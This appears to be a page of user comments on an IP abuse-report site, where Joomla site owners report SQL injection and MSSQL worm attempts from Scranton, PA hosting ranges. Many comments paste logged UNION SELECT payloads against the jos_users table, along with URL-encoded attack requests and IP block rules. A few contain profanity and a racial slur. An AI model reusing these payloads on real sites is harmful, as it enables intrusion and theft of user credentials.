Same as the 78.175.43.65 Maybe same user, using proxy, don\'t know. Tries to hack into my joomla site by injecting sql code, already reported him to his provider....

The above ip made multiple tries to inject my joomla website MySQL db and hack it I have records from my anti hack joomla extension if needed...

UDP from 124.239.195.131 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 1/13/2012 11:30:50 PM This was the report from my Kaspersky Internet Security. When I traced the IP it showed IP ...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are coming from the same ISP. Attempts number in the hundreds, would probably be thousands...

As others have posted, I\'ve begun to block entire ranges of IP addresses from Burstnet. Attempts are in the hundreds, if not thousands. Save yourself some headache, edit your .htaccess file to bloc...

As others have posted, I\'ve begun to block entire ranges of IP addresses from Burstnet. Attempts are in the hundreds, if not thousands. Save yourself some headache, edit your .htaccess file to bloc...

Yet another from Burstnet, attempts in the hundreds from Scranton PA, would be in the thousands if I\'d not resorted to blocking entire IP ranges from Burstnet. Save yourself some headache, edit your...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

So many hacking attempts from Scranton PA through Burstnet. This one was an attempt at SQL injection. It appears there are a group of hackers in PA going after Joomla sites....

Attacks from HostNOC servers - SQL injections - Joomla there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protec...

if we all block this server\'s entire IP range - they are effectively wiped off the internet Attacks from HostNOC servers - SQL injections - Joomla there has been a massive hacking spree originatin...

Attacks from HostNOC servers - SQL injections - Joomla there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protec...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your s...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attacks from HostNOC servers - SQL injections there has been a massive hacking spree originating from multiple HostNOC IP ranges, specifically targeting vulnerable Joomla extensions. protect your si...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

In the last month I have had HUNDREDS of attempted SQL injection hacks and other attacks all from Scranton, PA IP addresses, most from Burstnet. There must be a group of hackers targeting specific tec...

over 500 attempts and counting.... ** Union Select [GET:styletype] => -1/**/uNiOn/**/sELeCt/**/1,0x33633273366962,3,4,5,6,7,8/**/fRoM/**/jos_users-- ** Table name in url [GET:styletype] => -1 ...

Yet another character making attempts at SQL injection, the total is in the hundreds and all from Scranton PA. If you\'re posting here, consider notifying the hacker\'s ISP so maybe they\'ll take act...

I have logged over 500 hacking attempts from the Scranton PA server in the last two weeks and it is only getting worse. have informed them but no reply....

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

I have logged over 500 hacking attempts from the Scranton PA server in the last two weeks and it is only getting worse. have informed them but no reply....

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Another attempted SQL injection on my site - a HUGE number of hacking attempts from PA area, all are Burstnet. It\'s so bad I had to block the entire IP range 173.212 from my site. If someone attempt...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

Attempted SQL injection on my site. As others have noted, a HUGE number of hacking attempts from PA area, all are Burstnet. Attempts number in the hundreds, would probably be thousands had I not resor...

This hacker has been quite busy trying over the last couple of weeks to get into several sites in Belgium. Isn\'t there a way to stop these criminal activities?...

This m*fucker has now been attacking several sites over the last couple of weeks trying to steel user information. Isn\'t there any way that this looser can be located and punished?...

Someone needs to start a class action suit against hostnoc.net for their failure to stop these abusive hackers. It\'s almost as though Scranton, Pennsylvania is a haven for hackers from around the wor...

The entire 96.9.169.XXX address block is attempting SQL injection attacks on joomla sites. This has been going on for months. I finally just locked out the entire 255 sub addresses. /index.php?opti...

** Union Select [GET:id] => -1/**/uNiOn/**/sEleCt/**/0x33633273366962,2,3,4,5/**/fRoM/**/jos_users-- ** Union Select [REQUEST:id] => -1/**/uNiOn/**/sEleCt/**/0x33633273366962,2,3,4,5/**/fRoM/**/...

96.9.169.202, 96.9.169.198, 96.9.169.224, 96.9.169.250..... looks like a server farm is hacked.... My firewall is catching and blocking them before they get to the servers. More of an annoyance than a...

** Union Select [GET:id] => -1/**/uNiOn/**/ALL/**/sEleCt/**/1,0x33633273366962,3,4/**/fRoM/**/jos_users-- ** Union Select [REQUEST:id] => -1/**/uNiOn/**/ALL/**/sEleCt/**/1,0x33633273366962,3,4/*...

several attacks from this IP - Attention on 5 January 2012 there was an attempt to break my website - Type of attack: SQL-Injection ...

** Union Select [GET:id] => 1/**/aNd/**/1=2/**/uNiOn/**/sEleCt/**/0,1,2,3,4,5,6,7,8,9,10,11,12,0x33633273366962,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/fRoM/**/jos_user...

** Union Select [GET:id] => -2/**/uNiOn/**/sEleCt/**/0x33633273366962/**/from/**/jos_users-- ** Union Select [REQUEST:id] => -2/**/uNiOn/**/sEleCt/**/0x33633273366962/**/from/**/jos_users-- **P...

** Union Select [GET:packageId] => -156/**/uNiOn/**/sEleCt/**/1,2,3,0x33633273366962,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users-- ** Union Select [REQUEST:packageId] => -156/**/uNiOn...

** Union Select [GET:gbid] => -1/**/uNiOn/**/sEleCt/**/1,2,3,4,5,6,7,8,9,0x33633273366962,10,11,12,13,14,15,16,17,18,19/**/from/**/jos_users-- ** Union Select [REQUEST:gbid] => -1/**/uNiOn/**/sE...

** Union Select [GET:id] => -666/**/uNiOn/**/sEleCt/**/1,2,0x33633273366962,4,5,6,7,8,9,10,11,12/**/from/**/jos_users-- ** Union Select [REQUEST:id] => -666/**/uNiOn/**/sEleCt/**/1,2,0x336332733...

** Union Select [GET:biobookid] => -5/**/uNiOn/**/all/**/sELeCt/**/1,2,3,0x33633273366962/**/fRoM/**/jos_users-- ** Table name in url [GET:biobookid] => -5 -- 1,2,3,0x33633273366962 fRoM jos_use...

** Union Select [GET:catid] => null/**/uNiOn/**/sEleCt/**/0x33633273366962,2/**/from/**/jos_users-- ** Table name in url [GET:catid] => null -- 0x33633273366962,2 from jos_users-- ** Union Selec...

** Union Select [GET:category] => -666/**/uNiOn/**/sEleCt/**/6,0x33633273366962,6,6,5,6,6,6,6,6,6,6,6,6/**/from/**/jos_users-- ** Table name in url [GET:category] => -666 -- 6,0x33633273366962,6...

** Union Select [GET:aid] => -2/**/uNiOn/**/all/**/sEleCt/**/1,2,3,0x33633273366962,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/**/from/**/jos_users-- ** Table name in url...

** Union Select [GET:id] => null/**/uNiOn/**/sEleCt/**/1,2,3,4,0x33633273366962,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4...

Repeated attempts to attack site ** Union Select [GET:group_id] => -666/**/uNiOn/**/all/**/sEleCt/**/1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/jos_users-- ** Table name in url ...

** Union Select [GET:proyecto] => -666/**/uNiOn/**/sEleCt/**/1,2,3,0x33633273366962,5,6,7,8,9,10,11/**/from/**/mos_users-- ** Union Select [REQUEST:proyecto] => -666/**/uNiOn/**/sEleCt/**/1,2,3,...

Probably a script kiddy is performing SQL injection attacks from this IP address. This is becoming very annoying. Can this IP address be banned? There are more people complaining regarding this IP....

hack attempt on our joomla site from 96.9.169.224, 96.9.169.206 and 96.9.169.240. *REMOTE_ADDR : 96.9.169.224 *HTTP_USER_AGENT : Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefo...

from this IP, they try SQL injection. I complain about this to hosting, and seems I will forbiden all Ips from Pa, or even USA. More IPs recorded as source of attack: 66.197.172.242 ...

This is one of IPs from Scranton that try inject my SQL for weeks!! Does any authority in USA works anything on this matters?? More IPs recored for SQL injection: 96.9.149.70 96.9.149.86 96.9.169.240...

** Union Select [GET:catid] => null/**/uNiOn/**/sEleCt/**/0x33633273366962,2/**/from/**/jos_users-- ** Union Select [REQUEST:catid] => null/**/uNiOn/**/sEleCt/**/0x33633273366962,2/**/from/**/jo...

Don\'t know why these people can\'t be stopped. Same Scranton, PA area, same host -- hostnoc.net. Beyond ridiculous. ** Union Select [GET:id] => -999/**/uNiOn/**/all/**/sEleCt/**/0,0x33633273366...

In the last month I have had HUNDREDS of attempted SQL injection hacks and simultaneous server DDOS attacks from Scranton, PA IP addresses. Is there some sort of harmonic convergence of hackers there ...

This adress attempted to hack my site.. 64.191.13.162, I curse the one behind it. May Iao give you suffering. May Iao throw you in the darkness and swallow your soul. May pain become you and sickne...

This guy is trying to hack into my website using a known injection attack 64.191.13.150 - - [02/Jan/2012:22:08:51 -0700] \"GET /index.php?option=com_ksadvertiser&task=showcats&pid=null%2...

I just to submit complaint regarding the attack of this 64.191.13.146 ip address. it so annoying that this particular ip address keep on attacking my website. ...

Various IP\'s from domain 64.192.13. * attempting SQL injection on site. 64.191.13.156 64.191.13.146 64.191.13.162 Can\'t believe there is only one complaint about this? Can\'t believe I have to write...

this was blocked by my kaspersky internet security successfuly i would like to notify any one else if u download a update from windows this ip is trying to inject a virus or what ever it is worm think...

Sends to my computer on a daily basis - MS02-039_SQL_SERVER_RESOLUTION_EXPLOIT ........ .... .... .... ..... ..... ..... ..... ..... .... .... .... .... .... .... .... ......

this ip address was trying to attack with the help of worm.helkern (a sql worm as reported by kaspersky). I dont know properly what this is, but it was blocked by kaspersky pure antivirus, saying that...

What\'s up with Scranton and hostnoc.net? These have been going on for a month or so now. They got in once. Found the offending code and got rid of them. Now they are trying again. Can\'t they be stop...

** Union Select [GET:aid] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633...

** Union Select [GET:sid] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962/**/fRoM/**/jos_users-- ** Table name in u...

Always from the same location: Scranton, PA. Needs to stop! ** Union Select [GET:id] => -1/**/uNiOn/**/sELeCt/**/1,0x33633273366962,3,4,5,6,7,8/**/fRoM/**/jos_users-- ** Union Select [REQUEST:id]...

Getting tired of this crap. Always IPs from the same place, Scanton, PA. Can\'t somebody stop this?? ** Union Select [GET:cid] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962/**/fRo...

2011.12.09 - 5:44:27 :-: 173.212.197.54 : mail.wizzsolutions.com : option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6...

12:41:51 AM Block IN TCP 86.126.205.31 2331 86.127.74.46 1433 SYN Blocked by IP Blocklist IP Address: 86.126.205.31 IP Address Country: Romania (RO) IP Address Region: 32 Satu Mare IP Address City: ...

massive sql injections like below originating from this ip to random eu websites. same sqli like other reported here. thanks see sample sql injection below offer_view&id=369752%2F%2A%2A%2Funion%2...

this ip was running around 30 to 40 what appear to be injections to our site at benefitsandwork.co.uk joomla based site, listed requests on the server were (some) /forum?catid=)%20or%20(\'1\'=\'1-- /f...

Multiple attempts at trying to access myphp files- multiple attempts utilizing various addresses of myphp/Admin-2.1.0 and other variations of that. Multiple attempts at trying to access myphp files- m...

91.121.5.211 27/Dec/2011:06:32:56 +0100 403 : Interdit Mozilla/5.0 (Windows NT 6.1; WOW6 /staticfiles/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail...

asshole from China with his useless SQL ijections go fuck yourself rice eater boy2:11:05 PM Block IN TCP 112.101.64.141 6000 86.127.74.46 1433 SYN Blocked by the Attack Detecton componentIP Address: 1...

12/24/2011 10:42:56 PM Block IN TCP 184.107.157.130 43129 86.127.74.46 1433 SYN Blocked by the Attack Detecton component 12/24/2011 10:42:53 PM Block IN TCP 184.107.157.130 43129 86.127.74.46 1433 SYN...

1:09:06 PM Block IN TCP 86.126.135.138 60913 86.127.74.46 1433 SYN Blocked by the Attack Detecton component 12:44:17 PM Block IN TCP 86.126.135.138 62323 86.127.74.46 1433 SYN Blocked by the Attack De...

This address try to connect to my lokal port 1434. with sql interface. Why must i type 25 words?? Why must i type 25 words?? Why must i type 25 words?? ...

The following IP address have been attacking my site continuously for days: 66.197.227.185; 173.212.197.234; 184.82.79.120; I hope something can be done about it and very soon ...

Received hundreds of sql injection attacks from that IP They have been attacking all on my sites on an ongoing way from that IP address...

I have warning mail flooding my inbox with this idiot attempting to hack my site, would someone kindly advise as to the correct method of dealing with this continuous issue. IP keeps changing, but alw...

** Union Select [GET:catid] => 51/**/uNiOn/**/all/**/sELeCt/**/1,2,0x33633273366962,4,0x33633273366962,6,0x33633273366962/**/from/**/jos_users-- ** Table name in url [GET:catid] => 51 -- 1,2,0x3...

hackers here ** Union Select [GET:season] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x3363...

Hackers here: ** Union Select [GET:season] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x3363...

site slow from hacking attempts ** Union Select [GET:software_id] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962/**/from/**/jos_users-- ** Table name in url [GET:software_id] => -1 -- 0x33633273...

this IP is slowing my server with too many sql injection attempts ** Union Select [GET:location_id] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962...

This IP is attacking my sites so much it is slowing it down ** Union Select [GET:leagueID] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x3363327...

this hacker is slowing my server down... ** Union Select [GET:con] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x3363327336696...

This is getting annoying... ** Union Select [GET:id] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962/**/from/**/jos_users-- ** Table name in url [G...

SQL Injection attempts - over 400 times!! ** Union Select [GET:location_id] => -1/**/uNiOn/**/sELeCt/**/0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962,0x33633273366962/**/fro...

This Ip is showing up a lot in my logs and with over 400 sql injection attempts in two days, it is slowing my server. ** Union Select [GET:location_id] => -1/**/uNiOn/**/sELeCt/**/0x336332733669...

This one from China spiked my server load up to 31 by simultaneously attempting to exploit something in my Joomla sites. I am so sick of these attacks from China I\'m nearly ready to block anything fr...

My server has been hit repeatedly by this and several other IP\'s all emanating out of Scranton, Pennsylvania. The others were from hostnoc.net but this one is a new one. I am starting to block whole ...

this IP really annoying.. it keeps hacking and hacking my website with sql injection!!! -null/**/UnioN/**/SelECt/**/1,0x33633273366962/**/from/**/jos_users-- to: -null/**//**/SelECt/**/1,0x336332733...

Block the IPs with .htaccess # Deny IPs Joomla SQL Injection Order Allow,Deny allow from all deny from 173.212.197.142 deny from 173.212.227.48 deny from 173.212.197.48 deny from 173.212.254.50 de...

Been attacked with sql injection for 10 days now. My site is www.pet-book.com and the attackes is changing IP,s PLEASE help me to stop him....

Been attacked with sql injection for 10 days now. My site is www.pet-book.com and the attackes is changing IP,s PLEASE help me to stop him....

Been attacked with sql injection for 10 days now. My site is www.pet-book.com and the attackes is changing IP,s PLEASE help me to stop him....

We operate www.makemoneywithaccuauto.com. Today at 2:32pm received the following sql injected from 184.82.79.120. Please investigate this issue on our behalf. Thank you. USING KEY: option=com_jsjo...

This site is trying to use SQL injection to attack joomla websites, please close the IP down ASAP, they are hackers and need to be closed down...

Please close this IP down, ASAP they are hackers and need to closed down, why are they still up with so many complaints showing below...

JSecure mailed me: Currently Some User has try to access the administrator from following IP:66.197.227.185 USING KEY: option=com_jsjobs&task=edit&cid[]=-69%2F%2A%21uNiOn%2F%2A%2A%2FsElEcT%2F...

Had an attempt from this IP to use SQL injection to access my site. User at this IP address was apparently attempting to probe for information...

Had an attempt from this IP to use SQL injection to access my site. User at this IP address was apparently attempting to probe for information...

Had an attempt from this IP to use SQL injection to access my site. User at this IP address was apparently attempting to probe for information *REMOTE_ADDR : 69.162.119.162 ...

There were multiple attempts today logged with this notation in the log of two different Joomla sites of ours This is what was shown in the log: option=com_jsjobs&task=edit&cid[]=-69%2F%2A%2...

HACKERS FROM THIS AREA TRYING TO HACK MY PC WITHOUT SUCCESSIP Address: 86.126.111.218 IP Address Country: Romania (RO) IP Address Region: 39 Valcea IP Address City: Valcea IP Postal Code IP Address ...

trying to load not existing components from joomla backend. for example: index.php?option=com_crowdsource&view=design&cid=-3%2F%2A%2A%2FuNIOn%2F%2A%2A%2FsELECt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C...

** Union Select [GET:id] => -14/**/UnioN/**/SelECt/**/1,2,0x32,4/**/from/**/jos_users-- ** Table name in url [GET:id] => -14 -- 1,2,0x33,4 from jos_users-- ** Union Select [REQUEST:id] => -14...

Can\'t this be stopped? There should be a way to kill this ip. I shouldn\'t have to travel to china to do it myself. 12/11/2011 12:05:29 AM Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from...

My firewall just detected some fucktard from this IP trying to inject a SQL Worm this morning. Yesterday another IP from China tried to do the same thing....

got several tries with several ip\'s from hostnoc.net clients hacking with changed pattern for modules: com_sg com_garyscookbook com_jokes com_directory com_omnirealestate com_xfaq com_rapidrecipe co...

Jerry Dubois (jdubois@smusemulm.com) at this ip address tells me I\'ve been hacked then leaves a link for me to go to. No way willI click on that link. What\'s scary is he knows my name!...

** Union Select [GET:cat] => -1923/**/uNiOn/**/sElEcT/**/1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/from/**/jos_users-- ...

nion Select [REQUEST:catid] => -1/**/uNiOn/**/sElEcT/**/0x33633273366962/**/from/**/jos_users-- ** Table name in url [REQUEST:catid] => -1 -- 0x33633273366962 from jos_users-- **PAGE / SERVER I...

** Union Select [GET:articleid] => -1/**/uNiOn/**/sElEcT/**/1,0x33633273366962,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/jos_users-- ** Table name i...

** Union Select [GET:catid] => 1/**/uNiOn/**/sElEcT/**/1,2,0x33633273366962,4,5,6,7,8,9,10,11/**/from/**/jos_users-- ** Table name in url [GET:catid] => 1 -- 1,2,0x33633273366962,4,5,6,7,8,9,10,...

** Union Select [GET:catid] => 1/**/uNiOn/**/sElEcT/**/1,2,0x33633273366962,4,5,6,7,8,9,10,11/**/from/**/jos_users-- ** Table name in url [GET:catid] => 1 -- 1,2,0x33633273366962,4,5,6,7,8,9,10,...

** Union Select [GET:testo] => -a%\\\'/**/UNION/**/SELECT/**/1,2,0x33633273366962,4,5,6,7,8,9/**/from/**/jos_users-- ** Table name in url [GET:testo] => -a%\\\' -- 1,2,0x33633273366962,4,5,6,7,8...

** Union Select [GET:catid] => null/**/union/**/select/**/1,2,3,4,5,0x33633273366962,7,8,9,10/**/from/**/jos_users-- ** Table name in url [GET:catid] => null -- 1,2,3,4,5,0x33633273366962,7,8,9,...

** Union Select [GET:testo] => -a%\\\'/**/UNION/**/SELECT/**/1,2,0x33633273366962,4,5,6,7,8,9/**/from/**/jos_users-- ** Table name in url [GET:testo] => -a%\\\' -- 1,2,0x33633273366962,4,5,6,7,8...

Hello, Attention on 8 December 2011 there was an attempt to break your website. jFireWall successfully blocked the hackers attack. Attack parameters: Type of attack: SQL-Injection Scanner IP adress:...

I have a joomla site atacked by this host, I alread Blocked, shame on that person! I dont understand how this stupid person lost time in that action, he must be prosecuded at full extension of law! *...

8:43:20 PM Block IN TCP 86.126.113.40 2823 86.127.74.46 1433 SYN Blocked by the Attack Detecton component IP Address: 86.126.113.40 IP Address Country: Romania (RO) IP Address Region: 39 Valcea IP Ad...

Intrusion.Win.MSSQL.worm.Helkern used muliply times many times a day. Intrusion.Win.MSSQL.worm.Helkern used muliply times many times a day. Intrusion.Win.MSSQL.worm.Helkern used muliply times many tim...

** Union Select [GET:c] => -1/**/union/**/select/**/1,0x33633273366962,3,4,5/**/from/**/jos_users-- ** Table name in url [GET:c] => -1 -- 1,0x33633273366962,3,4,5 from jos_users-- ** Union Selec...

** Union Select [GET:id] => -1/**/union/**/select/**/0,0,0x33633273366962,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users-- ** Table name in url [GET:id] => -1 -- 0,0,0x33633273366962,0,0,0,0,0,0,0,0,0...

Multiple attacks all refering to: MS-SQL Worm propagation attempt 124.239.195.131 12/09/11 12:46:07 Seems that this is happening to more people than just me, so far my Firewall is keeping up...

Receiving all the last days from thisip, hostnoc and similar many attacks to my joomla website... About 10 atacks every hour... Hope to stop sometime.. Thanks to Marco\'s interceptor warning for jo...

In this post mention the hostname \"cybersyn.tuonda.es\", the domain \"tuonda.es\" is mine. \"cybersyn.tuonda.es\" is a old VPS that we have for backup in Burst.net, no...

Attempting to access mysql and database on a website that isn\'t even utilizing either-this went on for over 20 min. ip search also indicates this ip is connected to a spammer. These folks need to get...

Multiples ataques de inyección SQL a partir de direcciónes de un servidor ubicada en Estados Unidos creo que están intentando hackear las páginas ...

Multiple SQL injection attacks from three IP blocks. 66.197.128.0 / 17 173.212.192.0 / 24 96.9.128.0 / 18 All have abuse@hostnoc.net as the abuse email, they wont do a thing. Start on 12/6/11...

My joomla site has been tried to hack from this IP. The same internet provider tried on several attacks to hack into my site... I have successfully prevented it for the time being....

Switching around IP\'s but all lead back to Scranton, PA and hostnoc and burstnet. Have reported them to the host but they haven\'t bothered to answer. ** Union Select [GET:pageid] => -9999999/**...

Contacted abuse department and no response. This is ridiculous! This ip range and a couple of others all tied to hostnoc and burstnet are wreaking havoc with these attempts. ** Union Select [GET:ca...

Repeated attempts at SQL injection from this IP range as well as others. All lead back to Scranton, PA and hotnoc.net. ** Union Select [GET:id] => -1/**/union/**/select/**/0,0x33633273366962,0,0,...

From this IP range as well as another, all out of Scranton, PA. ** Union Select [GET:id] => -99999/**/union/**/select/**/0,1,0x33633273366962,0,0,0,0,0,0,0,0,0,0,0x33633273366962/**/from/**/mos_u...

Repeated attempts of SQL Injection on Joomla site. Numerous IP\'s used. This is just one... ** Union Select [GET:job_id] => -9999/**/union/**/all/**/select/**/0x33633273366962,2,3,4,5,6,7,8,9,0,1...

Multiple Hack attempts from this and similar IPs all originating from Burst Net on several sites I maintain. At least 4 sites are under constant attack every half hour at 15 minutes after and 45 minu...

Mi dominio esta siendo atacada reiteradamente desde hace dos dias ydurante todas las horas del día por una serie de IP que Yo he identificado Desde las siguientes direcciiones de IP173.21...

my domain is being attacked from this IP (and others). Most are of the same hosting provider. \"Marco\'s interceptor warning\" of Joomla Please stop this. The \"IP\" source: 6...

This IP and many others from the same hosting provider (Burst.net) did a lot of SQL injection these last days on my joomla sites. Time looser....

** Union Select [GET:id] => -999999/**/union/**/select/**/0,0,0x33633273366962,1,2,3,0,0,0,0,0,1,1,1,1,1,1,4,5,6,0x33633273366962/**/from/**/jos_users-- ** Table name in url [GET:id] => -999999 ...

attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: 96.9.173.40...

attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: 96.9.173.40...

Tons of attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: 96....

Very nasty attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: ...

Very nasty attempts out of Scranton, PA. Please investigate! Getting tired of this! Can someone please investigate? Has happened from all the IP\'s listed below in the last 24 hours. IPs included: ...

